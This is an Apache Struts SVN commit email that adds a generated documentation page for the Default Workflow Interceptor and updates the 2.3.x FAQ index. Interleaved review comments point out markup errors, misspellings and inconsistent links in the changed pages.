Posted to commits@struts.apache.org by rg...@apache.org on 2013/05/26 23:39:00 UTC

svn commit: r863224 [2/3] - in /websites/production/struts/content: development/2.x/docs/ release/2.3.x/docs/

Added: websites/production/struts/content/release/2.3.x/docs/default-workflow-interceptor.html
==============================================================================
--- websites/production/struts/content/release/2.3.x/docs/default-workflow-interceptor.html (added)
+++ websites/production/struts/content/release/2.3.x/docs/default-workflow-interceptor.html Sun May 26 21:38:59 2013
@@ -0,0 +1,219 @@
+
+<!-- 
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements.  See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership.  The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE- 2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied.  See the License for the
+specific language governing permissions and limitations
+under the License. 
+-->
+
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<HTML>
+  <HEAD>
+    <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+    <STYLE type="text/css">
+      .dp-highlighter {
+        width:95% !important;
+      }
+    </STYLE>
+    <STYLE type="text/css">
+      .footer {
+        background-image:      url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+        background-repeat:     repeat-x;
+        background-position:   left top;
+        padding-top:           4px;
+        color:                 #666;
+      }
+    </STYLE>
+    <SCRIPT type="text/javascript" language="javascript">
+      var hide = null;
+      var show = null;
+      var children = null;
+
+      function init() {
+        /* Search form initialization */
+        var form = document.forms['search'];
+        if (form != null) {
+          form.elements['domains'].value = location.hostname;
+          form.elements['sitesearch'].value = location.hostname;
+        }
+
+        /* Children initialization */
+        hide = document.getElementById('hide');
+        show = document.getElementById('show');
+        children = document.all != null ?
+                   document.all['children'] :
+                   document.getElementById('children');
+        if (children != null) {
+          children.style.display = 'none';
+          show.style.display = 'inline';
+          hide.style.display = 'none';
+        }
+      }
+
+      function showChildren() {
+        children.style.display = 'block';
+        show.style.display = 'none';
+        hide.style.display = 'inline';
+      }
+
+      function hideChildren() {
+        children.style.display = 'none';
+        show.style.display = 'inline';
+        hide.style.display = 'none';
+      }
+    </SCRIPT>
+    <TITLE>Default Workflow Interceptor</TITLE>
+  <META http-equiv="Content-Type" content="text/html;charset=UTF-8"></HEAD>
+  <BODY onload="init()">
+    <TABLE border="0" cellpadding="2" cellspacing="0" width="100%">
+      <TR class="topBar">
+        <TD align="left" valign="middle" class="topBarDiv" align="left" nowrap="">
+          &nbsp;<A href="home.html" title="Apache Struts 2 Documentation">Apache Struts 2 Documentation</A>&nbsp;&gt;&nbsp;<A href="home.html" title="Home">Home</A>&nbsp;&gt;&nbsp;<A href="guides.html" title="Guides">Guides</A>&nbsp;&gt;&nbsp;<A href="core-developers-guide.html" title="Core Developers Guide">Core Developers Guide</A>&nbsp;&gt;&nbsp;<A href="interceptors.html" title="Interceptors">Interceptors</A>&nbsp;&gt;&nbsp;<A href="" title="Default Workflow Interceptor">Default Workflow Interceptor</A>
+        </TD>
+        <TD align="right" valign="middle" nowrap="">
+          <FORM name="search" action="http://www.google.com/search" method="get">
+            <INPUT type="hidden" name="ie" value="UTF-8">
+            <INPUT type="hidden" name="oe" value="UTF-8">
+            <INPUT type="hidden" name="domains" value="">
+            <INPUT type="hidden" name="sitesearch" value="">
+            <INPUT type="text" name="q" maxlength="255" value="">        
+            <INPUT type="submit" name="btnG" value="Google Search">
+          </FORM>
+        </TD>
+      </TR> 
+    </TABLE>
+
+    <DIV id="PageContent">
+      <DIV class="pageheader" style="padding: 6px 0px 0px 0px;">
+        <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+        <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+        <DIV style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</DIV>
+        <DIV style="margin: 0px 10px 8px 10px" class="pagetitle">Default Workflow Interceptor</DIV>
+
+        <DIV class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+          <A href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=13995">
+            <IMG src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif" height="16" width="16" border="0" align="absmiddle" title="Edit Page"></A>
+            <A href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=13995">Edit Page</A>
+          &nbsp;
+          <A href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+            <IMG src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif" height="16" width="16" border="0" align="absmiddle" title="Browse Space"></A>
+            <A href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</A>
+          &nbsp;
+          <A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=13995">
+            <IMG src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif" height="16" width="16" border="0" align="absmiddle" title="Add Page"></A>
+          <A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=13995">Add Page</A>
+          &nbsp;
+          <A href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=13995">
+            <IMG src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif" height="16" width="16" border="0" align="absmiddle" title="Add News"></A>
+          <A href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=13995">Add News</A>
+        </DIV>
+      </DIV>
+
+      <DIV class="pagecontent">
+        <DIV class="wiki-content">
+          <P><P>
+An interceptor that makes sure there are not validation errors before allowing the interceptor chain to continue.
+<B>This interceptor does not perform any validation</B>.
+<P>
+<P>This interceptor does nothing if the name of the method being invoked is specified in the <B>excludeMethods</B>
+parameter. <B>excludeMethods</B> accepts a comma-delimited list of method names. For example, requests to
+<B>foo!input.action</B> and <B>foo!back.action</B> will be skipped by this interceptor if you set the
+<B>excludeMethods</B> parameter to &quot;input, back&quot;.
+<P>
+<B>Note:</B> As this method extends off MethodFilterInterceptor, it is capable of
+deciding if it is applicable only to selective methods in the action class. This is done by adding param tags
+for the interceptor element, naming either a list of excluded method names and/or a list of included method
+names, whereby includeMethods overrides excludedMethods. A single * sign is interpreted as wildcard matching
+all methods for both parameters.
+See MethodFilterInterceptor for more info.
+<P></P>
+
+<P><B>In DefaultWorkflowInterceptor</B>
+<P>applies only when action implements com.opensymphony.xwork2.Validateable</P>
+<OL>
+   <LI>if the action class have validate{MethodName}(), it will be invoked</LI>
+   <LI>else if the action class have validateDo{MethodName}(), it will be invoked</LI>
+   <LI>no matter if 1] or 2] is performed, if alwaysInvokeValidate property of the interceptor is &quot;true&quot; (which is by default &quot;true&quot;), validate() will be invoked.</LI>
+</OL></P>
+
+
+<H2><A name="DefaultWorkflowInterceptor-Parameters"></A>Parameters</H2>
+
+<P><P>
+<UL>
+<P>
+<LI>inputResultName - Default to &quot;input&quot;. Determine the result name to be returned when
+an action / field error is found.</LI>
+<P>
+</UL>
+<P></P>
+
+<H2><A name="DefaultWorkflowInterceptor-ExtendingtheInterceptor"></A>Extending the Interceptor</H2>
+
+<P><P>
+There are no known extension points for this interceptor.
+<P></P>
+
+<H2><A name="DefaultWorkflowInterceptor-Examples"></A>Examples</H2>
+
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent panelContent">
+<PRE class="code-xml">
+<SPAN class="code-tag">&lt;action name=<SPAN class="code-quote">&quot;someAction&quot;</SPAN> class=<SPAN class="code-quote">&quot;com.examples.SomeAction&quot;</SPAN>&gt;</SPAN>
+    <SPAN class="code-tag">&lt;interceptor-ref name=<SPAN class="code-quote">&quot;params&quot;</SPAN>/&gt;</SPAN>
+    <SPAN class="code-tag">&lt;interceptor-ref name=<SPAN class="code-quote">&quot;validation&quot;</SPAN>/&gt;</SPAN>
+    <SPAN class="code-tag">&lt;interceptor-ref name=<SPAN class="code-quote">&quot;workflow&quot;</SPAN>/&gt;</SPAN>
+    <SPAN class="code-tag">&lt;result name=<SPAN class="code-quote">&quot;success&quot;</SPAN>&gt;</SPAN>good_result.ftl<SPAN class="code-tag">&lt;/result&gt;</SPAN>
+<SPAN class="code-tag">&lt;/action&gt;</SPAN>
+
+&lt;-- In this case myMethod as well as mySecondMethod of the action class
+       will not pass through the workflow process --&gt;
+<SPAN class="code-tag">&lt;action name=<SPAN class="code-quote">&quot;someAction&quot;</SPAN> class=<SPAN class="code-quote">&quot;com.examples.SomeAction&quot;</SPAN>&gt;</SPAN>
+    <SPAN class="code-tag">&lt;interceptor-ref name=<SPAN class="code-quote">&quot;params&quot;</SPAN>/&gt;</SPAN>
+    <SPAN class="code-tag">&lt;interceptor-ref name=<SPAN class="code-quote">&quot;validation&quot;</SPAN>/&gt;</SPAN>
+    <SPAN class="code-tag">&lt;interceptor-ref name=<SPAN class="code-quote">&quot;workflow&quot;</SPAN>&gt;</SPAN>
+        <SPAN class="code-tag">&lt;param name=<SPAN class="code-quote">&quot;excludeMethods&quot;</SPAN>&gt;</SPAN>myMethod,mySecondMethod<SPAN class="code-tag">&lt;/param&gt;</SPAN>
+    <SPAN class="code-tag">&lt;/interceptor-ref name=<SPAN class="code-quote">&quot;workflow&quot;</SPAN>&gt;</SPAN>
+    <SPAN class="code-tag">&lt;result name=<SPAN class="code-quote">&quot;success&quot;</SPAN>&gt;</SPAN>good_result.ftl<SPAN class="code-tag">&lt;/result&gt;</SPAN>
+<SPAN class="code-tag">&lt;/action&gt;</SPAN>
+
+&lt;-- In this case, the result named <SPAN class="code-quote">&quot;error&quot;</SPAN> will be used when
+       an action / field error is found --&gt;
+&lt;-- The Interceptor will only be applied for myWorkflowMethod method of action
+       classes, since this is the only included method while any others are excluded --&gt;
+<SPAN class="code-tag">&lt;action name=<SPAN class="code-quote">&quot;someAction&quot;</SPAN> class=<SPAN class="code-quote">&quot;com.examples.SomeAction&quot;</SPAN>&gt;</SPAN>
+    <SPAN class="code-tag">&lt;interceptor-ref name=<SPAN class="code-quote">&quot;params&quot;</SPAN>/&gt;</SPAN>
+    <SPAN class="code-tag">&lt;interceptor-ref name=<SPAN class="code-quote">&quot;validation&quot;</SPAN>/&gt;</SPAN>
+    <SPAN class="code-tag">&lt;interceptor-ref name=<SPAN class="code-quote">&quot;workflow&quot;</SPAN>&gt;</SPAN>
+       <SPAN class="code-tag">&lt;param name=<SPAN class="code-quote">&quot;inputResultName&quot;</SPAN>&gt;</SPAN>error<SPAN class="code-tag">&lt;/param&gt;</SPAN>
+        <SPAN class="code-tag">&lt;param name=<SPAN class="code-quote">&quot;excludeMethods&quot;</SPAN>&gt;</SPAN>*<SPAN class="code-tag">&lt;/param&gt;</SPAN>
+        <SPAN class="code-tag">&lt;param name=<SPAN class="code-quote">&quot;includeMethods&quot;</SPAN>&gt;</SPAN>myWorkflowMethod<SPAN class="code-tag">&lt;/param&gt;</SPAN>
+    <SPAN class="code-tag">&lt;/interceptor-ref&gt;</SPAN>
+    <SPAN class="code-tag">&lt;result name=<SPAN class="code-quote">&quot;success&quot;</SPAN>&gt;</SPAN>good_result.ftl<SPAN class="code-tag">&lt;/result&gt;</SPAN>
+<SPAN class="code-tag">&lt;/action&gt;</SPAN>
+
+</PRE>
+</DIV></DIV>
+        </DIV>
+
+        
+      </DIV>
+    </DIV>
+    <DIV class="footer">
+      Generated by
+      <A href="http://www.atlassian.com/confluence/">Atlassian Confluence</A> (Version: 3.4.9 Build: 2042 Feb 14, 2011)
+      <A href="http://could.it/autoexport/">Auto Export Plugin</A> (Version: 1.0.0-dkulp)
+    </DIV>
+  </BODY>
+</HTML>
\ No newline at end of file
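Review bot: in the second struts.xml example the workflow reference is closed with </interceptor-ref name="workflow">; an end tag cannot carry an attribute, so anyone pasting this block into struts.xml gets a parse error. Close it with </interceptor-ref> as the third example does. In the same PRE block the comments open with "<--" and should open with "<!--". The Note paragraph says "includeMethods overrides excludedMethods" while the parameter is spelled excludeMethods everywhere else on the page, and the third list item refers to "1] or 2]" although the list renders as 1. and 2. Because the page states that the interceptor "does nothing" for methods named in excludeMethods, it is worth adding a sentence that such methods run even when validation errors have been recorded, so readers do not exclude a method that relies on validated input. The license comment URL also contains a stray space ("LICENSE- 2.0").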

Modified: websites/production/struts/content/release/2.3.x/docs/faqs.html
==============================================================================
--- websites/production/struts/content/release/2.3.x/docs/faqs.html (original)
+++ websites/production/struts/content/release/2.3.x/docs/faqs.html Sun May 26 21:38:59 2013
@@ -123,12 +123,13 @@ under the License. 
 
       <DIV class="pagecontent">
         <DIV class="wiki-content">
-          <DIV class="panelMacro"><TABLE class="tipMacro"><COLGROUP><COL width="24"><COL></COLGROUP><TR><TD valign="top"><IMG src="https://cwiki.apache.org/confluence/images/icons/emoticons/check.gif" width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD><B>Adding New FAQs</B><BR>Each FAQ should be cross-referenced from a relevant page in one of the guides. (If a relevant page in the guide is missing, then we probably need to create one!) Each question should be a new page. Answers should be concise and focused. If an answer seems long, or seems like it could relate to more than one section, then the question might be addressing more than one concern. 
+          <DIV class="panelMacro"><TABLE class="tipMacro"><COLGROUP><COL width="24"><COL></COLGROUP><TR><TD valign="top"><IMG src="https://cwiki.apache.org/confluence/images/icons/emoticons/check.gif" width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD><B>Adding New FAQs</B><BR>Each FAQ should be cross-referenced from a relevant page in one of the guides. (If a relevant page in the guide is missing, then we probably need to create one&#33;) Each question should be a new page. Answers should be concise and focused. If an answer seems long, or seems like it could relate to more than one section, then the question might be addressing more than one concern.
 
 <P>FAQs can also be &quot;mini-HOWTOs&quot;. As long as the question and answer are focused on a single concern, length is not an issue.</P></TD></TR></TABLE></DIV>
 
 
-<H3><A name="FAQs-Migrating"></A>Migrating </H3>
+
+<H3><A name="FAQs-Migrating"></A>Migrating</H3>
 
 <UL>
 	<LI>See the <A href="migration-guide.html" title="Migration Guide">Migration Guide</A></LI>
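Review bot: the "+" line for the Adding New FAQs panel turns "create one!" into "create one&#33;", while other hunks in this same file go the opposite way and decode &#63;, &#45; and &#40;/&#41; into literal characters. Pick one direction for the export so this churn does not reappear on the next run; a literal "!" is fine in HTML text.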
@@ -138,7 +139,7 @@ under the License. 
 <H3><A name="FAQs-General"></A>General</H3>
 
 <UL>
-	<LI><A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&title=Where%20do%20we%20get%20the%20latest%20version%20of%20the%20framework&linkCreation=true&fromPageId=14182" class="createlink">Where do we get the latest version of the framework</A>?</LI>
+	<LI><A href="where-do-we-get-the-latest-version-the-framework.html" title="Where do we get the latest version the framework">Where do we get the latest version the framework</A>?</LI>
 	<LI><A href="what-are-some-of-the-frameworks-best-features.html" title="What are some of the framework's best features">What are some of the framework's best features</A>?</LI>
 	<LI><A href="what-are-the-fundamental-differences-between-struts-and-jsf.html" title="What are the fundamental differences between Struts and JSF">What are the fundamental differences between Struts and JSF</A>?</LI>
 	<LI><A href="can-you-suggest-an-elevator-pitch.html" title="Can you suggest an elevator pitch">Can you suggest an elevator pitch</A>?</LI>
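Review bot: the replacement link under General reads "Where do we get the latest version the framework" in the file name, the title and the link text; the "of" that the removed createlink had ("latest version of the framework") is missing. Correct the wiki page title so the exported file name and text read properly.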
@@ -150,12 +151,12 @@ under the License. 
 <UL>
 	<LI><A href="how-can-we-display-dynamic-or-static-images-that-can-be-provided-as-an-array-of-bytes.html" title="How can we display dynamic or static images that can be provided as an array of bytes">How can we display dynamic or static images that can be provided as an array of bytes</A>?</LI>
 	<LI><A href="how-can-we-return-a-text-string-as-the-response.html" title="How can we return a text string as the response">How can we return a text string as the response</A>?</LI>
-	<LI><A href="how-can-we-test-applications.html" title="How can we test applications?">How can we test applications&#63;</A></LI>
+	<LI><A href="how-can-we-test-applications.html" title="How can we test applications?">How can we test applications?</A></LI>
 	<LI><A href="how-can-we-test-actions.html" title="How can we test Actions">How can we test Actions</A>?</LI>
 	<LI><A href="how-do-we-upload-files.html" title="How do we upload files">How do we upload files</A>?</LI>
 	<LI><A href="how-do-we-download-files-within-the-framework.html" title="How do we download files within the framework">How do we download files within the framework</A>?</LI>
-	<LI><A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&title=How%20can%20we%20force%20the%20Action%20Mappings%20(i.e.%20struts.xml)%20to%20reload&linkCreation=true&fromPageId=14182" class="createlink">How can we force the Action Mappings &#40;i.e. struts.xml&#41; to reload</A>?</LI>
-	<LI><A href="how-can-i-test-my-action-output-validation-or-the-action-execution-outside-a-container.html" title="How can I test my action output, validation or the action execution outside a container?">How can I test my action output, validation or the action execution outside a container&#63;</A></LI>
+	<LI><A href="how-can-we-force-the-action-mappings-strutsxml-to-reload.html" title="How can we force the Action Mappings (struts.xml) to reload">How can we force the Action Mappings &#40;struts.xml&#41; to reload</A>?</LI>
+	<LI><A href="how-can-i-test-my-action-output-validation-or-the-action-execution-outside-a-container.html" title="How can I test my action output, validation or the action execution outside a container?">How can I test my action output, validation or the action execution outside a container?</A></LI>
 </UL>
 
 
@@ -172,23 +173,23 @@ under the License. 
 
 <UL>
 	<LI><A href="how-do-we-get-access-to-the-session.html" title="How do we get access to the session">How do we get access to the session</A>?</LI>
-	<LI><A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&title=How%20do%20we%20invalidate%20the%20session&linkCreation=true&fromPageId=14182" class="createlink">How do we invalidate the session</A>?</LI>
+	<LI><A href="how-do-we-get-invalidate-the-session.html" title="How do we get invalidate the session">How do we get invalidate the session</A>?</LI>
 	<LI><A href="how-can-we-access-the-httpservletrequest.html" title="How can we access the HttpServletRequest">How can we access the HttpServletRequest</A>?</LI>
 	<LI><A href="how-can-we-access-the-httpservletresponse.html" title="How can we access the HttpServletResponse">How can we access the HttpServletResponse</A>?</LI>
 	<LI><A href="how-can-we-access-request-parameters-passed-into-an-action.html" title="How can we access request parameters passed into an Action">How can we access request parameters passed into an Action</A>?</LI>
 	<LI><A href="how-do-we-access-static-parameters-from-an-action.html" title="How do we access static parameters from an Action">How do we access static parameters from an Action</A>?</LI>
 	<LI><A href="can-we-access-an-actions-result.html" title="Can we access an Action's Result">Can we access an Action's Result</A>?</LI>
-	<LI><A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&title=How%20do%20I%20obtain%20security%20details%20(e.g.%20JAAS)&linkCreation=true&fromPageId=14182" class="createlink">How do I obtain security details &#40;e.g. JAAS&#41;</A>?</LI>
-	<LI><A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&title=How%20do%20we%20access%20the%20ActionInvocation,%20action%20name%20or%20namespace%20from%20a%20view&linkCreation=true&fromPageId=14182" class="createlink">How do we access the ActionInvocation, action name or namespace from a view</A></LI>
+	<LI><A href="how-do-i-obtain-security-details-jaas.html" title="How do I obtain security details (JAAS)">How do I obtain security details &#40;JAAS&#41;</A>?</LI>
+	<LI><A href="how-do-we-access-the-action-invocation-action-name-or-namespace-from-a-view.html" title="How do we access the Action Invocation, action name or namespace from a view">How do we access the Action Invocation, action name or namespace from a view</A>?</LI>
 </UL>
 
 
 <H3><A name="FAQs-PerPageSettings"></A>Per-Page Settings</H3>
 
 <UL>
-	<LI><A href="can-i-change-theme-on-a-per-page-basis.html" title="Can I change theme on a per-page basis">Can I change theme on a per&#45;page basis</A>?</LI>
-	<LI><A href="can-i-change-templatedir-on-a-per-page-basis.html" title="Can I change templateDir on a per-page basis">Can I change templateDir on a per&#45;page basis</A>?</LI>
-	<LI><A href="can-i-change-templatesuffix-on-a-per-page-basis.html" title="Can I change templateSuffix on a per-page basis">Can I change templateSuffix on a per&#45;page basis</A>?</LI>
+	<LI><A href="can-i-change-theme-on-a-per-page-basis.html" title="Can I change theme on a per-page basis">Can I change theme on a per-page basis</A>?</LI>
+	<LI><A href="can-i-change-templatedir-on-a-per-page-basis.html" title="Can I change templateDir on a per-page basis">Can I change templateDir on a per-page basis</A>?</LI>
+	<LI><A href="can-i-change-templatesuffix-on-a-per-page-basis.html" title="Can I change templateSuffix on a per-page basis">Can I change templateSuffix on a per-page basis</A>?</LI>
 </UL>
 
 
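Review bot: the new session link reads "How do we get invalidate the session" in its href, title and text, where the removed line had "How do we invalidate the session". The stray "get" matches the entry directly above it and should be dropped at the wiki page title before the URL is published. The same hunk also drops "e.g." from the JAAS entry, so "(JAAS)" now reads as the only option rather than an example; confirm that is intended.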
@@ -206,7 +207,7 @@ under the License. 
 <UL>
 	<LI><A href="why-is-my-action-returning-input-when-the-form-is-filled-out-correctly.html" title="Why is my action returning &quot;input&quot; when the form is filled out correctly">Why is my action returning &quot;input&quot; when the form is filled out correctly</A>?</LI>
 	<LI><A href="how-do-i-use-messages-from-within-the-validator.html" title="How do I use messages from within the validator">How do I use messages from within the validator</A>?</LI>
-	<LI><A href="how-can-i-fix-the-attribute-short-circuit-error-message.html" title="How can I fix the &quot;Attribute 'short-circuit'&quot; error message">How can I fix the &quot;Attribute 'short&#45;circuit'&quot; error message</A>?</LI>
+	<LI><A href="how-can-i-fix-the-attribute-short-circuit-error-message.html" title="How can I fix the &quot;Attribute 'short-circuit'&quot; error message">How can I fix the &quot;Attribute 'short-circuit'&quot; error message</A>?</LI>
 	<LI><A href="how-do-we-repopulate-controls-when-validation-fails.html" title="How do we repopulate controls when validation fails">How do we repopulate controls when validation fails</A>?</LI>
 	<LI><A href="how-do-i-unit-test-my-actions-validation-logic.html" title="How do I unit test my action's validation logic">How do I unit test my action's validation logic</A>?</LI>
 	<LI><A href="why-does-ww-ignore-my-message-when-its-enclosed-in-cdata.html" title="Why does WW ignore my message when its enclosed in CDATA">Why does WW ignore my message when its enclosed in CDATA</A>?</LI>
@@ -218,10 +219,10 @@ under the License. 
 <UL>
 	<LI><A href="how-do-we-change-locales.html" title="How do we change locales">How do we change locales</A>?</LI>
 	<LI><A href="how-do-i-set-a-global-resource-bundle.html" title="How do I set a global resource bundle">How do I set a global resource bundle</A>?</LI>
-	<LI><A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&title=How%20do%20I%20decouple%20XWork%20LocalizedTextUtil%20global%20resource%20bundle%20loading%20from%20servlets&linkCreation=true&fromPageId=14182" class="createlink">How do I decouple XWork LocalizedTextUtil global resource bundle loading from servlets</A>?</LI>
+	<LI><A href="how-do-i-decouple-xwork-localizedtextutil-global-resource-bundle-loading-from-serlvets.html" title="How do I decouple XWork LocalizedTextUtil global resource bundle loading from serlvets">How do I decouple XWork LocalizedTextUtil global resource bundle loading from serlvets</A>?</LI>
 	<LI><A href="how-do-i-add-i18n-to-a-ui-tag-like-the-textfield-tag.html" title="How do I add I18N to a UI tag, like the textfield tag">How do I add I18N to a UI tag, like the textfield tag</A>?</LI>
 	<LI><A href="can-i-add-i18n-outside-the-actions-context.html" title="Can I add I18N outside the Action's context">Can I add I18N outside the Action's context</A>?</LI>
-	<LI><A href="how-to-support-utf-8-uriencoding-with-tomcat.html" title="How to support UTF-8 URIEncoding with Tomcat">How to support UTF&#45;8 URIEncoding with Tomcat</A>?</LI>
+	<LI><A href="how-to-support-utf-8-uriencoding-with-tomcat.html" title="How to support UTF-8 URIEncoding with Tomcat">How to support UTF-8 URIEncoding with Tomcat</A>?</LI>
 	<LI><A href="how-do-i-enable-encoding-in-my-forms.html" title="How do I enable encoding in my forms">How do I enable encoding in my forms</A>?</LI>
 	<LI><A href="how-to-escape-special-chars-in-resource-bundles.html" title="How to escape special chars in resource bundles">How to escape special chars in resource bundles</A>?</LI>
 </UL>
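Review bot: "serlvets" is misspelled in the new LocalizedTextUtil link (file name, title and link text), whereas the removed createlink spelled it "servlets". Rename the wiki page, otherwise the typo becomes part of a published URL.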
@@ -248,15 +249,15 @@ under the License. 
 	<LI><A href="why-do-the-form-tags-put-table-tags-around-controls.html" title="Why do the form tags put table tags around controls">Why do the form tags put table tags around controls</A>?</LI>
 	<LI><A href="how-can-i-put-a-string-literal-in-a-javascript-call-for-instance-in-an-onchange-attribute.html" title="How can I put a String literal in a Javascript call, for instance in an onChange attribute">How can I put a String literal in a Javascript call, for instance in an onChange attribute</A>?</LI>
 	<LI><A href="why-wont-the-if-tag-evaluate-a-one-char-string.html" title="Why won't the 'if' tag evaluate a one char string">Why won't the 'if' tag evaluate a one char string</A>?</LI>
-	<LI><A href="why-does-freemarker-complain-that-theres-an-error-in-my-user-directive-when-i-used-jsp-tag.html" title="Why does FreeMarker complain that there's an error in my user-directive when I used JSP Tag">Why does FreeMarker complain that there's an error in my user&#45;directive when I used JSP Tag</A>?</LI>
+	<LI><A href="why-does-freemarker-complain-that-theres-an-error-in-my-user-directive-when-i-used-jsp-tag.html" title="Why does FreeMarker complain that there's an error in my user-directive when I used JSP Tag">Why does FreeMarker complain that there's an error in my user-directive when I used JSP Tag</A>?</LI>
 	<LI><A href="can-an-action-tag-run-another-method-apart-from-the-default-execute-method.html" title="Can an action tag run another method apart from the default execute method">Can an action tag run another method apart from the default execute method</A>?</LI>
 	<LI><A href="why-didnt-my-action-tag-get-executed-when-i-have-validation-errors.html" title="Why didn't my action tag get executed when I have validation errors">Why didn't my action tag get executed when I have validation errors</A>?</LI>
 	<LI><A href="why-are-request-parameters-appended-to-our-hyperlinks.html" title="Why are request parameters appended to our hyperlinks">Why are request parameters appended to our hyperlinks</A>?</LI>
 	<LI><A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&title=why%20doesn't%20the%20if%20tag%20evaluate%20params%20properly&linkCreation=true&fromPageId=14182" class="createlink">Why doesn't the if tag evaluate test=&quot;#parameters.someParam ... &quot; properly</A></LI>
 	<LI><A href="how-do-i-render-a-single-radio-button.html" title="How do I render a single radio button">How do I render a single radio button</A>?</LI>
-	<LI><A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&title=Why%20do%20I%20get%20a%20javax.el.ELException%20when%20using%20OGNL%20with%20JSP%202.1%3F&linkCreation=true&fromPageId=14182" class="createlink">Why do I get a javax.el.ELException when using OGNL with JSP 2.1&#63;</A></LI>
-	<LI><A href="why-cant-i-use-jstl-style-el-expressions-in-struts-tags.html" title="Why can't I use JSTL-style EL expressions in Struts tags?">Why can't I use JSTL&#45;style EL expressions in Struts tags&#63;</A></LI>
-	<LI><A href="how-can-i-iterate-over-a-range-like-with-jstls-foreach-tag.html" title="How can I iterate over a range, like with JSTL's forEach tag?">How can I iterate over a range, like with JSTL's forEach tag&#63;</A></LI>
+	<LI><A href="why-do-i-get-a-javaxelelexception-when-using-ognl-with-jsp21.html" title="Why do I get a javax.el.ELException when using OGNL with JSP2.1?">Why do I get a javax.el.ELException when using OGNL with JSP2.1&#63;</A></LI>
+	<LI><A href="why-cant-i-use-jstl-style-el-expressions-in-struts-tags.html" title="Why can't I use JSTL-style EL expressions in Struts tags?">Why can't I use JSTL-style EL expressions in Struts tags?</A></LI>
+	<LI><A href="how-can-i-iterate-over-a-range-like-with-jstls-foreach-tag.html" title="How can I iterate over a range, like with JSTL's forEach tag?">How can I iterate over a range, like with JSTL's forEach tag?</A></LI>
 </UL>
 
 
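Review bot: the new javax.el.ELException entry keeps "&#63;" in its link text while the two entries below it are changed to a literal "?" in this same hunk, and "JSP 2.1" has become "JSP2.1" in the title and file name. Separately, the unchanged line above it ("Why doesn't the if tag evaluate ...") still points at createpage.action on cwiki with class="createlink", so the published page keeps a link to the wiki's page-creation form; either create that page or drop the entry.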
@@ -267,7 +268,7 @@ under the License. 
 </UL>
 
 
-<H3><A name="FAQs-Spring"></A>Spring </H3>
+<H3><A name="FAQs-Spring"></A>Spring</H3>
 
 <UL>
 	<LI><A href="how-can-we-create-our-action-objects-from-the-spring-configuration.html" title="How can we create our Action objects from the Spring configuration">How can we create our Action objects from the Spring configuration</A>?</LI>
@@ -295,7 +296,7 @@ under the License. 
 	<LI><A href="weblogic-81.html" title="Weblogic 8.1">Weblogic 8.1</A></LI>
 	<LI><A href="jrockit.html" title="JRockit">JRockit</A></LI>
 	<LI><A href="multiple-struts-2-wars-in-a-single-ear.html" title="Multiple Struts 2 wars in a single ear">Multiple Struts 2 wars in a single ear</A></LI>
-	<LI><A href="google-app-engine-gae.html" title="Google App Engine (GAE)">Google App Engine &#40;GAE&#41;</A></LI>
+	<LI><A href="google-app-engine-gae.html" title="Google App Engine (GAE)">Google App Engine (GAE)</A></LI>
 </UL>
 
 
@@ -319,7 +320,7 @@ under the License. 
 </UL>
 
 
-<H3><A name="FAQs-Migrating"></A>Migrating </H3>
+<H3><A name="FAQs-Migrating"></A>Migrating</H3>
 
 <UL>
 	<LI><A href="why-is-my-action-unavailable.html" title="Why is my action unavailable">Why is my action unavailable</A>?</LI>
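Review bot: this heading uses name="FAQs-Migrating", the same anchor name as the Migrating heading near the top of the file (the one above the Migration Guide link), so a fragment link to #FAQs-Migrating can only ever reach the first of them. Give this second section its own title at the source so the export generates a distinct anchor.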
@@ -327,10 +328,9 @@ under the License. 
 
 
 
-
 <H2><A name="FAQs-Errata%3F"></A>Errata?</H2>
 
-<DIV class="panelMacro"><TABLE class="tipMacro"><COLGROUP><COL width="24"><COL></COLGROUP><TR><TD valign="top"><IMG src="https://cwiki.apache.org/confluence/images/icons/emoticons/check.gif" width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD>To suggest a change or a correction to any part of the documentation, log in and leave a comment on the appropriate page. We are always looking for <A href="http://struts.apache.org/2.x/docs/contributors-guide.html" class="external-link" rel="nofollow">help with the documentation!</A></TD></TR></TABLE></DIV>
